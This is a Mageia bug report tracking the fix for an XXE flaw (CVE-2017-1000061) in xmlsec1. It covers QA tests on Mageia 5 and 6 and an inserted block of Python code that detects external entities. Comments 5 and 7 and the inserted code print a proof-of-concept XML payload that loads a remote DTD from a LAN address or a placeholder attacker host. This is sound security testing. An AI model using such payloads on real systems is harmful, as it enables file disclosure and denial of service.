Bug 21586 - xmlsec1 new security issue CVE-2017-1000061
Summary: xmlsec1 new security issue CVE-2017-1000061
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 6
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA5TOO MGA5-64-OK MGA6-64-OK advisory
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2017-08-21 16:43 CEST by David Walser
Modified: 2017-08-24 23:19 CEST (History)

See Also:
Source RPM: xmlsec1-1.2.20-5.mga6.src.rpm
CVE: CVE-2017-1000061
Status comment:

Description David Walser 2017-08-21 16:43:13 CEST
RedHat has issued an advisory today (August 21):
https://access.redhat.com/errata/RHSA-2017:2492

Mageia 5 and Mageia 6 are also affected.
David Walser 2017-08-21 16:43:18 CEST

Whiteboard: (none) => MGA6TOO, MGA5TOO

Comment 1 Marja Van Waes 2017-08-21 20:10:18 CEST
Assigning to all packagers collectively, since there is no registered maintainer for this package.

Assignee: bugsquad => pkg-bugs
CC: (none) => marja11

Nicolas Lécureuil 2017-08-22 01:27:59 CEST

CC: (none) => mageia
Version: Cauldron => 6
CVE: (none) => CVE-2017-1000061
Whiteboard: MGA6TOO, MGA5TOO => MGA5TOO

Comment 2 Nicolas Lécureuil 2017-08-22 01:28:35 CEST
pushed in updates_testing
src.rpm:
        xmlsec1-1.2.24-1.mga5
        xmlsec1-1.2.24-1.mga6

Assignee: pkg-bugs => qa-bugs

Comment 3 David Walser 2017-08-22 02:07:13 CEST
Advisory:
========================

Updated xmlsec1 packages fix security vulnerability:

It was discovered xmlsec1's use of libxml2 inadvertently enabled external
entity expansion (XXE) along with validation. An attacker could craft an XML
file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs,
leading to information disclosure or denial of service (CVE-2017-1000061).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061
https://access.redhat.com/errata/RHSA-2017:2492
========================

Updated packages in core/updates_testing:
========================
xmlsec1-1.2.24-1.mga5
libxmlsec1_1-1.2.24-1.mga5
libxmlsec1-openssl1-1.2.24-1.mga5
libxmlsec1-nss1-1.2.24-1.mga5
libxmlsec1-gnutls1-1.2.24-1.mga5
libxmlsec1-gcrypt1-1.2.24-1.mga5
libxmlsec1-devel-1.2.24-1.mga5
xmlsec1-1.2.24-1.mga6
libxmlsec1_1-1.2.24-1.mga6
libxmlsec1-openssl1-1.2.24-1.mga6
libxmlsec1-nss1-1.2.24-1.mga6
libxmlsec1-gnutls1-1.2.24-1.mga6
libxmlsec1-gcrypt1-1.2.24-1.mga6
libxmlsec1-devel-1.2.24-1.mga6

from SRPMS:
xmlsec1-1.2.24-1.mga5.src.rpm
xmlsec1-1.2.24-1.mga6.src.rpm
Comment 4 Len Lawrence 2017-08-23 21:14:47 CEST
Testing this on mga5::x86_64, later.

CC: (none) => tarazed25

Comment 5 Len Lawrence 2017-08-24 11:34:13 CEST
mga5  x86_64

CVE-2017-1000061
PoC for XML External Entity attack.
https://github.com/lsh123/xmlsec/issues/43

Created file xinput.xml
$ cat xinput.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;]>

Fake command:
$ xmlsec1 --verify --output output.xml input.xml 
input.xml:1: I/O warning : failed to load HTTP resource
TYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;
                                                                               ^
 %remote; 
         ^
input.xml:2: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

Updated from Core Updates testing:

- lib64xmlsec1-devel-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gcrypt1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gnutls1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-nss1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-openssl1-1.2.24-1.mga5.x86_64
- lib64xmlsec1_1-1.2.24-1.mga5.x86_64
- xmlsec1-1.2.24-1.mga5.x86_64

$ xmlsec1 --verify --output output.xml copy.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='localhost:/glabel.xml'; xml error: 0: NULL
copy.xml:2: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=copy.xml; xml error: 4: Start tag expected, '<' not found

Error: failed to parse xml file "copy.xml"
Error: failed to load document "copy.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "copy.xml"

That appears to have worked. The updated software refuses to entertain External Entities.
Comment 6 Len Lawrence 2017-08-24 11:38:41 CEST
Continuing from comment 5.
xmlsec1 looks like a standalone and
$ urpmq --whatrequires lib64xmlsec1_1
lib64aqebics0
lib64xmlsec1-devel
lib64xmlsec1-gcrypt1
lib64xmlsec1-gnutls1
lib64xmlsec1-nss1
lib64xmlsec1-openssl1
lib64xmlsec1_1
xmlsec1

shows that the library is required by other libraries.

Giving this the OK based on a clean install and a positive PoC test.
Len Lawrence 2017-08-24 11:38:58 CEST

Whiteboard: MGA5TOO => MGA5TOO MGA5-64-OK
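
Added here as a defender-side illustration of the advisory in comment 3 and the PoC test in comment 5; it is not code from xmlsec, Mageia or this bug. It uses only Python's standard-library expat binding to flag external DTD and entity declarations before a file reaches a signature verifier, with a constructed copy of the comment-5 PoC (placeholder URL on the reserved host attacker.invalid) embedded as sample input.

```python
"""Pre-verification guard: refuse XML that declares external DTDs or entities.
Added example (not xmlsec or Mageia code); the stdlib expat binding is pinned
to never load parameter entities, so inspecting a file fetches nothing."""
import xml.parsers.expat as expat

# Constructed copy of the PoC from comment 5, with a placeholder URL.
POC_XML = (b'<?xml version="1.0" encoding="UTF-8"?>'
           b'<!DOCTYPE root [ <!ENTITY % remote SYSTEM '
           b'"http://attacker.invalid/remote.dtd"> %remote;]>')


def find_external_references(data: bytes) -> list:
    """Return (kind, name, uri) for every external DTD or entity reference."""
    findings = []
    parser = expat.ParserCreate()
    # xmlsec1's fix installs a refusing loader (xmlSecNoXxeExternalEntityLoader
    # in comment 5); here expat simply never resolves external subsets or
    # parameter entities while we look at what the document declares.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # <!DOCTYPE root SYSTEM "..."> requests an external DTD subset.
        if system_id or public_id:
            findings.append(("doctype", name, system_id or public_id))

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a value; SYSTEM/PUBLIC ones point outside.
        if system_id or public_id:
            kind = "parameter-entity" if is_param else "general-entity"
            findings.append((kind, name, system_id or public_id))

    def on_external_ref(context, base, system_id, public_id):
        # Reached for &name; references to external general entities in content;
        # returning 0 makes expat abort rather than resolve the reference.
        findings.append(("entity-ref", context, system_id or public_id))
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # e.g. the PoC has no root element; we only care what it declared
    return findings


def safe_to_verify(data: bytes) -> bool:
    """True when the document may be handed to a signature verifier."""
    return not find_external_references(data)
```

Calling find_external_references(POC_XML) yields a single parameter-entity finding for "remote", so safe_to_verify rejects the file, while a document whose DOCTYPE declares only internal entities passes.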

Comment 7 Len Lawrence 2017-08-24 15:08:51 CEST
mga6  X86_64

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.3/evil.dtd"> %remote;]>

$ xmlsec1 --verify --output output.xml input.xml
error : Operation in progress
input.xml:1: I/O warning : failed to load external entity "http://192.168.3.1/evil.dtd"
!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;
                                                                               ^
 %remote; 
         ^
input.xml:3: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

After updating the xml packages:
$ xmlsec1 --verify --output output.xml input.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL
input.xml:3: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found

Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

This is good for 64-bits.
Len Lawrence 2017-08-24 15:09:39 CEST

Whiteboard: MGA5TOO MGA5-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK

Comment 8 Lewis Smith 2017-08-24 22:03:47 CEST
Validating under temporary policy as we have 1 test per release.

Keywords: (none) => validated_update
Whiteboard: MGA5TOO MGA5-64-OK MGA6-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK advisory
CC: (none) => lewyssmith, sysadmin-bugs

Comment 9 Mageia Robot 2017-08-24 23:19:24 CEST
An update for this issue has been pushed to the Mageia Updates repository.

http://advisories.mageia.org/MGASA-2017-0305.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED

